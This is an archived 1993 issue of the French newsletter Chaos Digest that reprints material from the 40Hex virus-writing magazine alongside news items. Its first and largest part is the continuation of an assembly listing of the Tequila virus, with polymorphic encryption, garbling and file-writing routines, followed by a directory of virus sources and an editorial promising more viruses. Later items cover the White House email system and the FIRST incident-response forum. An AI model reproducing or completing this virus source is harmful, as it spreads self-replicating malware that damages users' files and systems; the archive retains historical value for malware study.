home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / pc / KAOS1_44.ZIP / KAOS1-44
Encoding:
Text File  |  1993-06-03  |  27.7 KB  |  826 lines
  1. Chaos Digest              Mercredi 2 Juin 1993        Volume 1 : Numero 44
  2.                              ISSN 1244-4901
  3.  
  4.        Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
  5.        Archiviste: Yves-Marie Crabbe
  6.        Co-Redacteurs: Arnaud Bigare, Stephane Briere
  7.  
  8. TABLE DES MATIERES, #1.44 (2 Juin 1993)
  9. File 1--40H VMag Issue 1 Volume 4 #012(2)-014 (reprint)
  10. File 2--Adresse electronique de Bill Clinton (news)
  11. File 3--FIRST, nouveau forum anti-hackers aux USA (lutte)
  12. File 4--Liste de diffusion de _The Hack Report_ (abonnement)
  13. File 5--Autre type de chaos (identification)
  14.  
  15. Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
  16. available at no cost by sending a message to:
  17.                 linux-activists-request@niksula.hut.fi
  18. with a mail header or first line containing the following informations:
  19.                     X-Mn-Admin: join CHAOS_DIGEST
  20.  
  21. The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
  22. or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
  23. 155, 93404 St-Ouen Cedex, France.  He is a member of the EICAR and EFF (#1299)
  24. groups.
  25.  
  26. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
  27. 466893.  Back issues of ChaosD can be found on the Internet as part of the
  28. Computer underground Digest archives. They're accessible using anonymous FTP:
  29.  
  30.         * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
  31.         * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
  32.         * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
  33.         * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
  34.         * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
  35.         * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
  36.         * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
  37.         * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos
  38.  
  39. CHAOS DIGEST is an open forum dedicated to sharing French information among
  40. computerists and to the presentation and debate of diverse views. ChaosD
  41. material may be reprinted for non-profit as long as the source is cited.
  42. Some authors do copyright their material, and they should be contacted for
  43. reprint permission.  Readers are encouraged to submit reasoned articles in
  44. French, English or German languages relating to computer culture and
  45. telecommunications.  Articles are preferred to short responses.  Please
  46. avoid quoting previous posts unless absolutely necessary.
  47.  
  48. DISCLAIMER: The views represented herein do not necessarily represent
  49.             the views of the moderators. Chaos Digest contributors
  50.             assume all responsibility for ensuring that articles
  51.             submitted do not violate copyright protections.
  52.  
  53. ----------------------------------------------------------------------
  54.  
  55. Date: Tue May 11 09:24:40 PDT 1993
  56. From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
  57. Subject: File 1--40H VMag Issue 1 Volume 4 #012(2)-014 (reprint)
  58.  
  59. [suite du listing du virus Tequila]
  60.  
  61.  
  62. WRITE_THE_NEW_HEADER:
  63.    CALL 0696             ;Masm Mod. Needed
  64.  OUT_OF_ENCRYPT:
  65.    RET
  66.  
  67. COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE:
  68.    PUSH BP
  69.    XOR AH,AH
  70.    INT 01A
  71.    MOV AX,DX
  72.    MOV BP,DX
  73.    PUSH DS
  74.    POP ES
  75.    MOV DI,0960
  76.    MOV SI,DI
  77.    MOV CX,020
  78.    CLD
  79.    REP STOSW
  80.    XOR DX,DX
  81.    MOV ES,DX
  82.    CALL ENCRYPT_STEP_ONE
  83.    CALL ENCRYPT_STEP_TWO
  84.    CALL ENCRYPT_STEP_THREE
  85.    MOV B[SI],0E9
  86.    MOV DI,028C
  87.    SUB DI,SI
  88.    SUB DI,3
  89.    INC SI
  90.    MOV W[SI],DI
  91.    MOV AX,0A04
  92.    CALL AX
  93.    POP BP
  94.    RET
  95.  
  96. ENCRYPT_STEP_ONE:
  97.    DEC BP
  98.    ES TEST B[BP],2           ;Masm Mod. Needed
  99.    JNE 08EB                  ;Masm Mod. Needed
  100.    MOV B[SI],0E
  101.    INC SI
  102.    CALL GARBLER
  103.    MOV B[SI],01F
  104.    INC SI
  105.    CALL GARBLER
  106.    RET
  107.    MOV W[SI],0CB8C
  108.    INC SI
  109.    INC SI
  110.    CALL GARBLER
  111.    MOV W[SI],0DB8E
  112.    INC SI
  113.    INC SI
  114.    CALL GARBLER
  115.    RET
  116.  
  117. ENCRYPT_STEP_TWO:
  118.    AND CH,0FE
  119.    DEC BP
  120.    ES TEST B[BP],2           ;Masm Mod. Needed
  121.    JE 0920                   ;Masm Mod. Needed
  122.    OR CH,1
  123.    MOV B[SI],0BE
  124.    INC SI
  125.    MOV W[SI],BX
  126.    INC SI
  127.    INC SI
  128.    CALL GARBLER
  129.    ADD BX,0960
  130.    TEST CH,1
  131.    JE 0934                   ;Masm Mod. Needed
  132.    MOV B[SI],0BB
  133.    INC SI
  134.    MOV W[SI],BX
  135.    INC SI
  136.    INC SI
  137.    CALL GARBLER
  138.    ADD BX,0960
  139.    TEST CH,1
  140.    JE 090C                   ;Masm Mod. Needed
  141.    SUB BX,0960
  142.    CALL GARBLER
  143.    MOV B[SI],0B9
  144.    INC SI
  145.    MOV AX,0960
  146.    MOV W[SI],AX
  147.    INC SI
  148.    INC SI
  149.    CALL GARBLER
  150.    CALL GARBLER
  151.    RET
  152.  
  153. ENCRYPT_STEP_THREE:
  154.    MOV AH,014
  155.    MOV DH,017
  156.    TEST CH,1
  157.    JE 0958                   ;Masm Mod. Needed
  158.    XCHG DH,AH
  159.    MOV DI,SI
  160.    MOV AL,08A
  161.    MOV W[SI],AX
  162.    INC SI
  163.    INC SI
  164.    CALL GARBLER
  165.    XOR DL,DL
  166.    MOV B[0A39],028           ;Masm Mod. Needed
  167.    DEC BP
  168.    ES TEST B[BP],2           ;Masm Mod. Needed
  169.    JE 0978                   ;Masm Mod. Needed
  170.    MOV DL,030
  171.    MOV B[0A39],DL            ;Masm Mod. Needed
  172.    MOV W[SI],DX
  173.    INC SI
  174.    INC SI
  175.    MOV W[SI],04346
  176.    INC SI
  177.    INC SI
  178.    CALL GARBLER
  179.    MOV AX,0FE81
  180.    MOV CL,0BE
  181.    TEST CH,1
  182.    JE 0993                   ;Masm Mod. Needed
  183.    MOV AH,0FB
  184.    MOV CL,0BB
  185.    MOV W[SI],AX
  186.    INC SI
  187.    INC SI
  188.    PUSH BX
  189.    ADD BX,040
  190.    MOV W[SI],BX
  191.    INC SI
  192.    INC SI
  193.    POP BX
  194.    MOV B[SI],072
  195.    INC SI
  196.    MOV DX,SI
  197.    INC SI
  198.    CALL GARBLER
  199.    MOV B[SI],CL
  200.    INC SI
  201.    MOV W[SI],BX
  202.    INC SI
  203.    INC SI
  204.    MOV AX,SI
  205.    SUB AX,DX
  206.    DEC AX
  207.    MOV BX,DX
  208.    MOV B[BX],AL
  209.    CALL GARBLER
  210.    CALL GARBLER
  211.    MOV B[SI],0E2
  212.    INC SI
  213.    SUB DI,SI
  214.    DEC DI
  215.    MOV AX,DI
  216.    MOV B[SI],AL
  217.    INC SI
  218.    CALL GARBLER
  219.    RET
  220.  
  221. GARBLER:
  222.    DEC BP
  223.    ES TEST B[BP],0F          ;Masm Mod. Needed
  224.    JE RET                    ;Masm Mod. Needed
  225.    DEC BP
  226.    ES MOV AL,B[BP]           ;Masm Mod. Needed
  227.    TEST AL,2
  228.    JE 0A0E                   ;Masm Mod. Needed
  229.    TEST AL,4
  230.    JE 09F7                   ;Masm Mod. Needed
  231.    TEST AL,8
  232.    JE 09F1                   ;Masm Mod. Needed
  233.    MOV W[SI],0C789
  234.    INC SI
  235.    INC SI
  236.    JMP RET                   ;Masm Mod. Needed
  237.    MOV B[SI],090
  238.    INC SI
  239.    JMP RET                   ;Masm Mod. Needed
  240.    MOV AL,085
  241.    DEC BP
  242.    ES MOV AH,B[BP]           ;Masm Mod. Needed
  243.    TEST AH,2
  244.    JE 0A05                   ;Masm Mod. Needed
  245.    DEC AL
  246.    OR AH,0C0
  247.    MOV W[SI],AX
  248.    INC SI
  249.    INC SI
  250.    JMP RET                   ;Masm Mod. Needed
  251.    DEC BP
  252.    ES TEST B[BP],2           ;Masm Mod. Needed
  253.    JE 0A1A                   ;Masm Mod. Needed
  254.    MOV AL,039
  255.    JMP 09F9                  ;Masm Mod. Needed
  256.    MOV B[SI],0FC
  257.    INC SI
  258.    RET
  259.  
  260. MAKE_THE_DISK_WRITE:
  261.    CALL PERFORM_ENCRYPTION_DECRYPTION
  262.    MOV AH,040
  263.    MOV BX,W[09A4]
  264.    MOV DX,0
  265.    MOV CX,09A4
  266.    PUSHF
  267.    CALL D[09B4]              ;Masm Mod. Needed
  268.    JB 0A37                   ;Masm Mod. Needed
  269.    SUB AX,CX
  270.    PUSHF
  271.    CMP B[0A39],028           ;Masm Mod. Needed
  272.    JNE 0A44                  ;Masm Mod. Needed
  273.    MOV B[0A39],0             ;Masm Mod. Needed
  274.    CALL PERFORM_ENCRYPTION_DECRYPTION
  275.    POPF
  276.    RET
  277.  
  278. PERFORM_ENCRYPTION_DECRYPTION:
  279.    MOV BX,0
  280.    MOV SI,0960
  281.    MOV CX,0960
  282.    MOV DL,B[SI]
  283.    XOR B[BX],DL
  284.    INC SI
  285.    INC BX
  286.    CMP SI,09A0
  287.    JB 0A61                   ;Masm Mod. Needed
  288.    MOV SI,0960
  289.    LOOP 0A52                 ;Masm Mod. Needed
  290.    RET
  291.  
  292. THE_FILE_DECRYPTING_ROUTINE:
  293.    PUSH CS
  294.    POP DS
  295.    MOV BX,4
  296.    MOV SI,0964
  297.    MOV CX,0960
  298.    MOV DL,B[SI]
  299.    ADD B[BX],DL
  300.    INC SI
  301.    INC BX
  302.    CMP SI,09A4
  303.    JB 0A7E                   ;Masm Mod. Needed
  304.    MOV SI,0964
  305.    LOOP 0A6F                 ;Masm Mod. Needed
  306.    JMP 0390                  ;Masm Mod. Needed
  307.  
  308. ;========== THE FOLLOWING IS NOT PART OF THE VIRUS ========
  309. ;==========       BUT IS MERELY THE BOOSTER.       ========
  310.  
  311. START:
  312.    LEA W[0104],EXIT          ;Masm Mod. Needed
  313.    MOV W[0106],CS            ;Masm Mod. Needed
  314.    MOV BX,CS
  315.    SUB W[0106],BX            ;Masm Mod. Needed
  316.    JMP INSTALL
  317.  
  318. EXIT:
  319.    INT 020
  320.  
  321. TEQUILA ENDP
  322. CODE_SEG ENDS
  323. END TEQUILA
  324.  
  325. +++++
  326.  
  327. 40Hex Issue 4                                            December 1991
  328.  
  329. Left Blank
  330. Cause its bad
  331. luck
  332.     how about something real dumb like....
  333.  
  334.  
  335. Directory of C:\TASM
  336.  
  337. .            <DIR>     11-28-91  11:44a
  338. ..           <DIR>     11-28-91  11:44a
  339. LAB          <DIR>     12-10-91   8:45p
  340. 1605     ASM     38553 12-09-91  12:31p
  341. 911      ASM     19267 12-10-91   7:21p
  342. 911      SDF      7084 12-10-91  10:41p
  343. BBRAINS  ASM      8990 08-06-91   3:04p
  344. BMONDAY  ASM     21455 12-09-91  12:31p
  345. BOBVIRUS ASM     21280 12-14-91   4:38p
  346. BRU_TEST COM        11 12-16-91   1:52p
  347. CANCER   ASM      2600 02-09-91  12:38a
  348. DARTH2   ASM      8938 12-09-91  11:50a
  349. DEADPOOL ASM      5324 12-14-91   1:00a
  350. DIR2SCAN ASM       892 12-22-91   1:17a
  351. DIR2SCAN COM       112 12-22-91   1:17a
  352. EMFII    ASM     16755 12-08-91  10:55p
  353. FILES    DOC      2373 12-11-91   9:58a
  354. FUNNY    ASM      5807 12-18-91  12:46p
  355. FUNNY    COM       208 12-18-91  12:46p
  356. GREP     DOC     13619 03-13-91   2:02a
  357. HAPPY    ASM      5667 12-18-91  12:32p
  358. HAPPY    MAP        34 12-25-91  11:27a
  359. HEADER              94 12-09-91  10:25a
  360. JOKER    ASM     16258 11-10-91  10:55p
  361. KILL-FSP ASM      1475 11-12-91   4:28p
  362. KILL-FSP COM        55 12-25-91  11:26a
  363. KILL-FSP EXE       823 12-25-91  11:26a
  364. KILL-FSP MAP       103 12-25-91  11:26a
  365. KILL-FSP OBJ       195 12-25-91  11:26a
  366. MAKE     EXE     37056 03-13-91   2:02a
  367. MANUAL   DOC     52126 03-13-91   2:02a
  368. MBIOS    MAC     13380 03-13-91   2:02a
  369. MG-1     ASM      4527 12-17-91  10:58a
  370. MG-1     SDF      2319 12-17-91  10:58a
  371. NAILME   ASM       206 12-18-91  10:01p
  372. NAILME   COM       100 12-19-91  10:26a
  373. OBJXREF  DOC     18404 03-13-91   2:02a
  374. PARITY   ASM      5837 12-09-91  12:49p
  375. PH-VIR1  TXT     22086 11-04-91   9:00p
  376. PROLOG   DOC     23811 03-13-91   2:02a
  377. RAGE     ASM      9335 11-29-91  12:17p
  378. SR       EXE    117543 10-30-89   8:00a
  379. SURVEY   DOC      4479 11-29-91   1:01p
  380. TASM     EXE    106521 03-13-91   2:02a
  381. TASM     TAH    167927 03-13-91   2:02a
  382. TCREF    DOC      4954 03-13-91   2:02a
  383. TCREF    EXE      7856 03-13-91   2:02a
  384. TD       EXE    409360 03-13-91   2:02a
  385. TDCONFIG TD       1208 12-06-91  12:01p
  386. TDCONVRT EXE     35366 03-13-91   2:02a
  387. TDDEV    EXE      8544 03-13-91   2:02a
  388. TDHELP   TDH    126541 03-13-91   2:02a
  389. TDINST   EXE    107638 03-13-91   2:02a
  390. TDMAP    EXE     16944 03-13-91   2:02a
  391. TDMEM    EXE     14256 12-24-91   8:19p
  392. TDNMI    COM       644 03-13-91   2:02a
  393. TDPACK   EXE     25520 03-13-91   2:02a
  394. TDREMOTE EXE     20738 03-13-91   2:02a
  395. TDRF     EXE     17376 03-13-91   2:02a
  396. TDSTRIP  EXE     13868 03-13-91   2:02a
  397. TDUMP    EXE     70554 03-13-91   2:02a
  398. THELP    COM      9912 11-28-91  11:46a
  399. THELP    DOC      7619 03-13-91   2:02a
  400. TINY     ASM      4233 01-01-80  12:26a
  401. TINY     TXT        92 01-01-80  12:25a
  402. TINYB    ASM      4404 01-01-80  12:32a
  403. TINYB    TXT        89 01-01-80  12:31a
  404. TINYC    ASM      4669 01-01-80  12:14a
  405. TINYC    TXT       118 01-01-80  12:31a
  406. TINYD    ASM      5486 01-01-80  12:02a
  407. TINYE    ASM      6464 01-01-80  12:09a
  408. TLIB     EXE     35668 03-13-91   2:02a
  409. TLINK    DOC      3837 03-13-91   2:02a
  410. TLINK    EXE     53510 03-13-91   2:02a
  411. TOUCH    COM      5118 03-13-91   2:02a
  412. UPDATE   DOC     20266 03-13-91   2:02a
  413. VIENNA   ASM     26395 09-30-87  12:59a
  414. VIOL-C   ASM     19096 12-16-91  10:25p
  415. VSAFE    COM     32050 03-28-91   1:00p
  416. VWATCH   COM     12263 03-28-91   1:00p
  417. WIN      COM     19358 12-24-91   9:52p
  418. WINFIX   ASM      2603 12-21-91   8:18p
  419. WINFIX   COM       357 12-24-91   9:52p
  420. WINFIX   MAP       103 12-24-91   9:52p
  421. WINFIX   OBJ       553 12-24-91   9:52p
  422.        85 file(s)    1939259 bytes
  423.  
  424. Directory of C:\TASM\LAB
  425.  
  426. .            <DIR>     12-10-91   8:45p
  427. ..           <DIR>     12-10-91   8:45p
  428. LAB          <DIR>     12-10-91   8:46p
  429. AMAG0589 TXT     46529 05-21-89   7:06p
  430. AMAG1289 TXT    113270 12-16-89  12:21p
  431. BIT      ASM       778 08-30-91   8:33p
  432. BIT      MAP       103 12-24-91  11:31p
  433. BIT      OBJ       192 12-24-91  11:31p
  434. BUGOFF   ASM       903 12-25-91  11:59a
  435. BUGOFF   COM        43 12-25-91  11:59a
  436. BUGOFF   MAP       103 12-25-91  11:59a
  437. BUGOFF   OBJ       198 12-25-91  11:59a
  438. CRACK-W  ASM      1430 12-24-91   7:49p
  439. CRACK-W  MAP       103 12-24-91   7:47p
  440. DIR      ASM     10274 12-25-91  12:46a
  441. DIR      MAP        99 12-25-91  12:48a
  442. DIR      OBJ       961 12-25-91  12:48a
  443. DIR      SDF      5032 12-25-91  12:46a
  444. DL       ASM       416 12-14-91   6:35p
  445. DUMB     DOC     52346 12-19-91   1:46p
  446. ENW                  3 12-19-91   6:02p
  447. EXE_FILE ASM        80 12-24-91  12:36a
  448. EXE_FILE EXE       516 12-24-91  12:36a
  449. EXE_FILE MAP       220 12-24-91  12:36a
  450. EXE_FILE OBJ       183 12-24-91  12:36a
  451. FUCK_UP  DOC       198 12-23-91  10:33a
  452. FUNGUS   ASM     17120 12-21-91   1:37p
  453. FUNGUS   SDF      4933 12-21-91   1:34p
  454. HAP      ASM      2440 12-16-91  12:42p
  455. HAPPY    ASM      7144 12-25-91  11:30a
  456. HAPPY    COM       248 12-25-91  11:28a
  457. HAPPY    MAP        99 12-25-91  11:28a
  458. HAPPY    OBJ       424 12-25-91  11:28a
  459. HEADER              94 12-09-91  10:25a
  460. KENNEDY  ASM      6663 12-25-91  12:43a
  461. KENNEDY  SDF      2803 12-25-91  12:43a
  462. KILL     ASM       517 12-19-91   6:05p
  463. MAR-INST BAT       205 08-31-91  12:13a
  464. MAR-INST DOC      1037 08-31-91  12:20a
  465. MARAUDER ASM     21997 12-23-91  10:21a
  466. MARAUDER DOC      2305 12-20-91   9:40a
  467. MAR_ASM! ZIP      5361 12-23-91  10:35a
  468. MODES    ASM       244 12-25-91   7:22p
  469. MODES    COM         7 12-25-91   7:22p
  470. MODES    MAP        99 12-25-91   7:22p
  471. MODES    OBJ       136 12-25-91   7:22p
  472. NEW      ASM     21997 12-23-91  10:21a
  473. NEW      COM       869 12-25-91  12:12a
  474. NEW      MAP       103 12-25-91  12:12a
  475. NEW      OBJ      1261 12-25-91  12:12a
  476. NEW_KILL ASM      1318 12-23-91  10:29a
  477. NEXT     ASM      2208 12-25-91  12:41a
  478. PS       ANS      3218 11-25-91   9:43p
  479. SECTOR   ASM      1573 12-11-91  10:52p
  480. SS       DOC       270 08-08-91   3:00p
  481. SS       EXE      6898 08-08-91   3:00p
  482. TARGET   ASM       472 12-20-91   3:32p
  483. TARGET   COM       100 12-25-91   8:53p
  484. TARGET   MAP       103 12-25-91   8:53p
  485. TARGET   OBJ       261 12-25-91   8:53p
  486.        60 file(s)     348507 bytes
  487.  
  488. Directory of C:\TASM\LAB\LAB
  489.  
  490. .            <DIR>     12-10-91   8:46p
  491. ..           <DIR>     12-10-91   8:46p
  492.         2 file(s)          0 bytes
  493.  
  494. Total files listed:
  495.       147 file(s)    2287766 bytes
  496.                      1843200 bytes free
  497.  
  498. +++++
  499.  
  500. 40Hex Issue 4                                            December 1991
  501.  
  502.                             Is This The End?
  503.                             ++++++++++++++++
  504.  
  505.    Well, to be honest.  I'm kind of tired writing this magazine.  It's
  506.    not like I hate it or anything, it's just too much pressure for one
  507.    person to handle.  Decimator helped me out a bit with a few articals
  508.    and such.  But still every time I do an issue it's me who does the
  509.    marjority of the work.  It seems the magazine is bigger than I
  510.    thought.  It seems to be on everybodys BBS from NY to California,
  511.    from Canada to Europe.  The thing is I can't write this thing by
  512.    myself anymore.  I work everyday from 2pm - 10pm and I will be going
  513.    back to school next semester.  So I don't have time to handle all the
  514.    things I do.  So in the long run the magazine suffers.  Anyway,
  515.    unless people want to help out (mabey the reason is that I haven't
  516.    really asked before) lemme know.  Contact me on Digital Warefare.
  517.    The numbers in an artical in this issue somewhere I'm sure.  Anyway,
  518.    fuck it, If people don't contribute soon this may well be the last
  519.    issue of this rag ever.  So whatever happens in 1992, we shall see.
  520.    So if this is it, later people.  My viruses will still be coming on
  521.    strong as always...
  522.  
  523.    Later
  524.    Hellraiser 12/26/91
  525.  
  526. ------------------------------
  527.  
  528. Date: Thu Jun  3 01:48:14 -0400 1993
  529. From: postmaster@whitehouse.gov
  530. Subject: File 2--Adresse electronique de Bill Clinton (news)
  531.  
  532. [ChaosD: Voici la reponse recu a un courrier envoye ce matin au President
  533. des Etats-Unis sur sa nouvelle messagerie ouverte le premier du mois:
  534. President@WhiteHouse.gov.]
  535.  
  536.  
  537.      Thank you for sending in your thoughts and comments to the
  538. President via electronic mail.  We are pleased to introduce this
  539. new form of communication into the White House for the first time
  540. in history.  I welcome your response and participation.
  541.  
  542.      As we work to reinvent government and streamline our
  543. processes, this electronic mail experiment will help put us on
  544. the leading edge of progress.  Please remember, though, this is
  545. still very much an experiment.
  546.  
  547.      Your message has been read, and we are keeping careful track
  548. of all the mail we are receiving electronically.  We will be
  549. trying out a number of response-based systems shortly, and I ask
  550. for your patience as we move forward to integrate electronic mail
  551. from the public into the White House.
  552.  
  553.      Again, on behalf of the President, thank you for your
  554. message and for taking part in the White House electronic mail
  555. project.
  556.  
  557.                                   Sincerely,
  558.  
  559.                         Marsha Scott, Deputy Assistant
  560.                         to the  President and Director
  561.                               of Correspondence
  562.  
  563. ------------------------------
  564.  
  565. Date: May 29, 1993 08:47:48 GMT
  566. From: gregory@email.teaser.com (Gregory Noe )
  567. Subject: File 3--FIRST, nouveau forum anti-hackers aux USA (lutte)
  568. Copyright: Worldwide Videotex & The Baltimore Sun, 1993
  569.  
  570.  
  571. RESPONSE GROUP FORMED TO HANDLE INTERNATIONAL COMPUTER AND NETWORK SECURITY
  572.      PROBLEMS
  573. Mainframe Computing      May 00, 1993   V. 6   NO. 5    p.  1
  574.  
  575. Government  and  private  organizations  in  North  America  and Europe are
  576. joining  forces  to help combat and prevent the world's escalating computer
  577. and network security problems.
  578.  
  579. Known  as  the   *Forum  of  Incident  Response  and  Security  Teams*,  or
  580. FIRST,  the  coalition  brings  together  a  variety  of  computer security
  581. incident  response  teams  from  the public and private sectors, as well as
  582. from  universities.  FIRST  aims  to foster cooperation and coordination in
  583. incident  prevention, to prompt rapid reaction to incidents, and to promote
  584. information  sharing  among its members. FIRST currently includes more than
  585. 20  response  teams  and  liaisons  (see  attached  list  of  participating
  586. organizations).
  587.  
  588. Participation  in  FIRST is voluntary, and member teams must fund their own
  589. involvement.  One  of  FIRST's  chief  goals  is  to  expand  the number of
  590. participating  incident  response teams and to foster increased cooperation
  591. in incident response-related activities.
  592.  
  593. In  general,  a response team is set up to serve a defined constituency. In
  594. many  cases,  a team serves a single organization's computer network users.
  595. Other  teams are operated by computer vendors and deal primarily with their
  596. specific  operating  systems.  Incident response teams generally augment an
  597. organization's  overall  computer  security efforts by focusing on computer
  598. security incidents.
  599.  
  600. The  FIRST  Secretariat  is  responsible  for  various  administrative  and
  601. coordination activities. The National Institute of Standards and Technology
  602. serves as the secretariat.
  603.  
  604. "Computer  security vulnerabilities associated with information technology,
  605. such   as  malicious  abuse  or  viruses,  require  a  rapid,  skilled  and
  606. coordinated  response  to  minimize  damage,"  said  Dennis  Steinauer, who
  607. oversees  NIST's  participation  in  FIRST  and  chairs  the FIRST Steering
  608. Committee.  "For  a  response  team  to  be  effective,  it must have rapid
  609. communication  both  within  its  own  constituency and with other incident
  610. response  teams.  That's  what FIRST aims to accomplish." FIRST members, he
  611. said,  use  automatic  alerting mechanisms, electronic mail and a number of
  612. other methods to achieve this rapid communication.
  613.  
  614. FIRST is working to achieve  several goals:
  615.  
  616. *  To boost cooperation among information technology users in the effective
  617. prevention, detection and recovery from computer security incidents;
  618.  
  619. *  To  provide a means to alert and advise clients on potential threats and
  620. emerging incident situations;
  621.  
  622. *  To  support  and  promote  the  actions  and activities of participating
  623. incident response teams, including research and operational activities; and
  624.  
  625. *  To  simplify  and encourage the sharing of security-related information,
  626. tools and techniques.
  627.  
  628. FIRST  membership has grown quickly from 11 original teams to more than 20.
  629. Although   initial   membership  consisted  primarily  of  U.S.  government
  630. organizations, membership of private-sector organizations, universities and
  631. non-U.S.   organizations   is   growing.   Many   are  finding  that  FIRST
  632. participation  offers  extensive  information  and  help  in  combating and
  633. preventing  computer  security  incidents.  FIRST officials state, however,
  634. that  members  are expected to participate actively in the forum. The FIRST
  635. Secretariat  can  provide  information on establishing an incident response
  636. capability  and  on  FIRST  membership.
  637.  
  638. For more information, contact:
  639.  
  640. FIRST Secretariat
  641. Attn:  Dennis Steinauer
  642. National Institute of Standards and Technology
  643. A216 Technology Building
  644. Gaithersburg, MD 20899-0001
  645. Phone: (301)975-3359
  646. Electronic Mail: first-sec@nist.gov.
  647.  
  648. +++++
  649.  
  650. COMPUTER SECURITY EXPERTS ON THE ALERT
  651. BALTIMORE MORNING SUN (BS) - Monday, May 24, 1993
  652. By: Steve Auerweck Staff Writer
  653. Edition: Final  Section: Financial  Page: 12C
  654.  
  655.  
  656. On  Nov. 2, 1988, Robert Morris, a Cornell University graduate student from
  657. Arnold, set loose a "worm" that soon disabled thousands of computers on the
  658. Internet, an enormous but loose conglomeration of computers nationwide.
  659.  
  660.    Not  long afterward, a group of computer security experts meeting at the
  661. National Security Agency headquarters at Fort Meade to discuss the disaster
  662. laid  the  groundwork  for  FIRST, the *Forum  of  Incident   Response  and
  663. Security Teams.
  664.  
  665.    FIRST,  coordinated  out  of  the  National  Institute  of Standards and
  666. Technology  offices  in  Gaithersburg,  is a coalition of computer security
  667. response teams from both the public and private sectors.
  668.  
  669.    Dennis  Steinauer,  chairman  of the FIRST steering committee, describes
  670. the need this way: "As more and more organizations get themselves hooked up
  671. to  networks  .  .  .  the threat population has increased, or at least the
  672. avenues of exposure."
  673.  
  674.    So  FIRST  now  brings  together a variety of outfits that might need to
  675. respond  swiftly  to security threats. They range from teams at the Defense
  676. Department  to  US Sprint, the Space Physics Analysis Network in France and
  677. the Government Centre for Information Systems in the United Kingdom.
  678.  
  679.    The  idea  is to provide swift communication among members about current
  680. or potential problems, such as computer viruses or virulent hackers.
  681.  
  682.    "We're  not  a  professional or educational organization," Mr. Steinauer
  683. says. "This is an operational activity."
  684.  
  685.    Their  main  avenue  of  communication  is  the  Internet, but they also
  686. learned  a  lesson  in  1988. "We have backup methods in place that we test
  687. from time to time," Mr. Steinauer says, "including the telephone."
  688.  
  689.    FIRST  is  contemplating  staging "a fairly extensive drill"; it has not
  690. yet been challenged by any major incidents.
  691.  
  692. COMPUTER SCIENCES LAB WINS DEFENSE CONTRACT
  693.  
  694.    Computer  Sciences  Corp.  learned  last  week that its Network Security
  695. Integration  Laboratory,  located  near  Fort  Meade,  won a $19.9 million,
  696. four-year  contract to provide information security services to the Defense
  697. Department.
  698.  
  699.    The  laboratory  works with the National Computer Security Center, which
  700. is  affiliated  with  the  NSA.  The  Anne Arundel lab averages 40 workers,
  701. supported  by  another  60  at  CSC's Systems Engineering Division in Falls
  702. Church, Va. No new positions are anticipated here.
  703.  
  704.    CSC,  headquartered  in  El  Segundo,  Calif., had received a $6 million
  705. contract for the first phase of the project last October.
  706.  
  707.    Its  security laboratory evaluates encryption devices built for computer
  708. networks,  telephones,  fax machines and the like, and helps users put them
  709. to work in specific applications. It also tests security systems and builds
  710. mock-ups for Defense Department projects.
  711.  
  712. DIGITAL OFFERS $5,000 TO BREAK V-CARD SYSTEM
  713.  
  714.    Digital  Enterprises  Inc.  of Gaithersburg has a challenge for hackers:
  715. Break its anti-virus scheme and win $5,000.
  716.  
  717.    The  company  sells a hardware/software protection system called V-Card.
  718. If  you  can  beat  the  machine at its headquarters -- no Trojan horses or
  719. bombs allowed, the company says -- you'll win the prize.
  720.  
  721.    Enterprising hackers can call Digital at (301) 926-6937.
  722.  
  723. MICROPROSE GAMES HEADED FOR CD FORMATS
  724.  
  725.    Hunt  Valley's MicroProse Software Inc. has licensed several of its most
  726. popular  game  titles  to  Capitol  Multimedia  Inc. for release in two new
  727. mass-market  compact  disk  formats.  The  Washington company will develop,
  728. market  and  distribute the games for CD-I (CD-Interactive) and Sony CD-ROM
  729. XA machines.
  730.  
  731.    The  titles  covered  by  the  worldwide  pact  are Sid Meier's Pirates,
  732. Railroad  Tycoon  and  Civilization, as well as Silent Service and Airborne
  733. Ranger.
  734.  
  735. WAVERLY TO DISTRIBUTE DAROX VIDEODISCS
  736.  
  737.    Waverly   Inc.'s   Electronic  Media  Division  will  be  the  exclusive
  738. distributor  of interactive videodiscs put out for nursing schools by Darox
  739. Corp. of La Jolla, Calif.
  740.  
  741.    Darox  now  has  32  titles  for  health  professionals, with more being
  742. developed.  They  join other Waverly products for medical instruction, such
  743. as  the  Medi-Sim  computer-assisted  instruction  programs  and  a line of
  744. videos.
  745.  
  746. MAGAZINE SEEKS COMPUTER NIGHTMARES
  747.  
  748.    Has  your computer driven you right to the edge? Are you ready to hire a
  749. disgruntled postal worker to blast the thing to smithereens? Do you long to
  750. fold, spindle and mutilate?
  751.  
  752.    Put  those  problems  on  paper  and  you  may  win a restful weekend in
  753. California, courtesy of San Diego's ComputorEdge Magazine.
  754.  
  755.    Its  Computer  Dementia  Contest  seeks a 1,000-word essay on your worst
  756. computer nightmare. The most horrid wins a weekend out West.
  757.  
  758.    "We  have  a  couple  hundred entries so far," said the magazine's Kevin
  759. Leap.  "Some are pretty hilarious. There was a guy who got Doritos stuck in
  760. the  keyboard and woke up the next morning with 220,000 pages of the letter
  761. 'E.' "
  762.  
  763.    Send entries to P.O. Box 83086, San Diego, Calif. 92138. The deadline is
  764. July 31.
  765. --
  766. *-*-*-*-*-*-*-*-*-*-*-*-*-*-         gregory@email.teaser.com
  767. -    Gregory  NOE          *         ________________________
  768. *    PARIS  (France)       -
  769. -*-*-*-*-*-*-*-*-*-*-*-*-*-*
  770.  
  771. ------------------------------
  772.  
  773. Date: 10 May 1993 03:17:51 GMT
  774. From: doug@cc.ysu.edu (Doug Sewell )
  775. Subject: File 4--Liste de diffusion de _The Hack Report_ (abonnement)
  776.  
  777.  
